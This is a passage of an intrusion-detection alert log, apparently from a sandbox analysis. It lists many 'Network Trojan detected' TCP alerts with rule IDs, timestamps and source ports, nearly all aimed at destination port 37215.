                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032201
                SID:2829579
                Source Port:46174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790344
                SID:2835222
                Source Port:54418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683290
                SID:2829579
                Source Port:39610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682950
                SID:2835222
                Source Port:35682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716153
                SID:2835222
                Source Port:45814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663470
                SID:2829579
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383559
                SID:2835222
                Source Port:41920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022842
                SID:2835222
                Source Port:35998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916049
                SID:2835222
                Source Port:55046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881746
                SID:2835222
                Source Port:41128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504712
                SID:2835222
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663579
                SID:2835222
                Source Port:35074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942415
                SID:2829579
                Source Port:41970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452038
                SID:2829579
                Source Port:55708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228225
                SID:2835222
                Source Port:46150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055878
                SID:2829579
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325015
                SID:2829579
                Source Port:58908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790640
                SID:2835222
                Source Port:49344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991113
                SID:2835222
                Source Port:58538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703677
                SID:2829579
                Source Port:54396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661180
                SID:2829579
                Source Port:52526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778239
                SID:2829579
                Source Port:53528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453667
                SID:2829579
                Source Port:52168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470308
                SID:2829579
                Source Port:52386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679393
                SID:2835222
                Source Port:53880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408232
                SID:2835222
                Source Port:39496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670512
                SID:2835222
                Source Port:35284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024022
                SID:2829579
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916105
                SID:2835222
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803728
                SID:2835222
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503908
                SID:2835222
                Source Port:47336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701201
                SID:2835222
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015018
                SID:2829579
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341576
                SID:2829579
                Source Port:50342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520730
                SID:2835222
                Source Port:41690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289191
                SID:2835222
                Source Port:55038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942482
                SID:2829579
                Source Port:51266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735463
                SID:2835222
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718592
                SID:2835222
                Source Port:60824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718979
                SID:2829579
                Source Port:36070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411853
                SID:2835222
                Source Port:35588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678162
                SID:2835222
                Source Port:56648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184472
                SID:2829579
                Source Port:41776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804095
                SID:2835222
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198516
                SID:2829579
                Source Port:41478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148925
                SID:2835222
                Source Port:47088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291116
                SID:2829579
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368237
                SID:2829579
                Source Port:44860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505002
                SID:2835222
                Source Port:41956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932878
                SID:2829579
                Source Port:48314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338143
                SID:2835222
                Source Port:54344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072740
                SID:2835222
                Source Port:39678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.642892
                SID:2829579
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:11.295539
                SID:2840516
                Source Port:23
                Destination Port:38722
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776694
                SID:2829579
                Source Port:48626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669919
                SID:2829579
                Source Port:46144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412368
                SID:2835222
                Source Port:44580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980305
                SID:2829579
                Source Port:45094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029213
                SID:2835222
                Source Port:37772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027273
                SID:2835222
                Source Port:40560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132755
                SID:2835222
                Source Port:49234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732941
                SID:2835222
                Source Port:34774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181853
                SID:2829579
                Source Port:44346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971924
                SID:2835222
                Source Port:34284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184883
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777260
                SID:2835222
                Source Port:52840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322983
                SID:2835222
                Source Port:51500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471269
                SID:2829579
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453903
                SID:2835222
                Source Port:33878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471653
                SID:2829579
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160684
                SID:2835222
                Source Port:59508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979466
                SID:2829579
                Source Port:49912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564099
                SID:2835222
                Source Port:38426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569321
                SID:2829579
                Source Port:58274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024728
                SID:2835222
                Source Port:37398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011030
                SID:2835222
                Source Port:49270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979759
                SID:2835222
                Source Port:41630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367670
                SID:2835222
                Source Port:40162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829057
                SID:2835222
                Source Port:45852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451860
                SID:2835222
                Source Port:49800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202148
                SID:2829579
                Source Port:36914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761778
                SID:2835222
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847803
                SID:2835222
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503821
                SID:2829579
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548284
                SID:2835222
                Source Port:36332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717410
                SID:2835222
                Source Port:57636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762848
                SID:2829579
                Source Port:43348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989009
                SID:2829579
                Source Port:40188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689131
                SID:2829579
                Source Port:57510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616147
                SID:2835222
                Source Port:44082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425058
                SID:2835222
                Source Port:35664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564939
                SID:2835222
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848287
                SID:2835222
                Source Port:46600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148309
                SID:2835222
                Source Port:52666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966600
                SID:2829579
                Source Port:45318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978893
                SID:2835222
                Source Port:35488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941570
                SID:2835222
                Source Port:55470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151299
                SID:2829579
                Source Port:34722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806496
                SID:2835222
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224581
                SID:2829579
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453460
                SID:2835222
                Source Port:40744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322900
                SID:2835222
                Source Port:43128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053763
                SID:2835222
                Source Port:53434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017256
                SID:2835222
                Source Port:36266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181569
                SID:2835222
                Source Port:57484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369389
                SID:2835222
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677365
                SID:2835222
                Source Port:40918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340764
                SID:2835222
                Source Port:43282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165358
                SID:2835222
                Source Port:43938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517398
                SID:2829579
                Source Port:32872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053895
                SID:2829579
                Source Port:45642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183983
                SID:2829579
                Source Port:46170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015750
                SID:2835222
                Source Port:40606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703727
                SID:2835222
                Source Port:37134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277887
                SID:2829579
                Source Port:55746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810493
                SID:2835222
                Source Port:37190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321698
                SID:2835222
                Source Port:41236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181765
                SID:2835222
                Source Port:45662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879079
                SID:2835222
                Source Port:57078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943708
                SID:2835222
                Source Port:34190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861461
                SID:2829579
                Source Port:45632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849164
                SID:2835222
                Source Port:52782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503381
                SID:2829579
                Source Port:53116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161389
                SID:2835222
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242608
                SID:2835222
                Source Port:36900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791490
                SID:2829579
                Source Port:33152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294955
                SID:2829579
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.093082
                SID:2835222
                Source Port:52470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761560
                SID:2835222
                Source Port:43112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184859
                SID:2835222
                Source Port:43024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242572
                SID:2835222
                Source Port:35300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072932
                SID:2829579
                Source Port:45494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807678
                SID:2829579
                Source Port:39054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967653
                SID:2835222
                Source Port:33640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985111
                SID:2835222
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566614
                SID:2835222
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850331
                SID:2835222
                Source Port:47682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014724
                SID:2829579
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849012
                SID:2829579
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861256
                SID:2829579
                Source Port:35918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452919
                SID:2835222
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683594
                SID:2829579
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969817
                SID:2835222
                Source Port:48392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384470
                SID:2829579
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979206
                SID:2829579
                Source Port:43758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070798
                SID:2829579
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014899
                SID:2835222
                Source Port:45568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827923
                SID:2829579
                Source Port:37098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289053
                SID:2835222
                Source Port:46058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336677
                SID:2835222
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687040
                SID:2835222
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669795
                SID:2835222
                Source Port:54308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245208
                SID:2835222
                Source Port:56136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145902
                SID:2835222
                Source Port:45268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763243
                SID:2835222
                Source Port:50336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017759
                SID:2829579
                Source Port:39712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878734
                SID:2835222
                Source Port:50746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806950
                SID:2829579
                Source Port:41634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028050
                SID:2835222
                Source Port:59598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804374
                SID:2829579
                Source Port:35178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759038
                SID:2835222
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519744
                SID:2835222
                Source Port:45400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813456
                SID:2835222
                Source Port:39022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115441
                SID:2829579
                Source Port:33172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253766
                SID:2835222
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245658
                SID:2829579
                Source Port:52616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808414
                SID:2829579
                Source Port:56758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990388
                SID:2829579
                Source Port:55956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448120
                SID:2829579
                Source Port:42788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760980
                SID:2835222
                Source Port:46856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452780
                SID:2835222
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185619
                SID:2829579
                Source Port:37818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146437
                SID:2829579
                Source Port:36870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999487
                SID:2835222
                Source Port:43690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662561
                SID:2829579
                Source Port:58950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661802
                SID:2835222
                Source Port:39392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230804
                SID:2835222
                Source Port:56394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016156
                SID:2829579
                Source Port:47188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790086
                SID:2829579
                Source Port:54612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381538
                SID:2829579
                Source Port:50278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763071
                SID:2829579
                Source Port:45628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014591
                SID:2835222
                Source Port:60632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134889
                SID:2829579
                Source Port:49608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861620
                SID:2829579
                Source Port:43498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022097
                SID:2829579
                Source Port:51460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660480
                SID:2835222
                Source Port:33534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829170
                SID:2829579
                Source Port:40726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471501
                SID:2829579
                Source Port:34828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453389
                SID:2835222
                Source Port:53308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932917
                SID:2829579
                Source Port:44468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934625
                SID:2835222
                Source Port:52208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977066
                SID:2829579
                Source Port:42462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054514
                SID:2835222
                Source Port:41450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859414
                SID:2829579
                Source Port:54120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326155
                SID:2829579
                Source Port:36386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340988
                SID:2829579
                Source Port:45210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968427
                SID:2829579
                Source Port:54144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
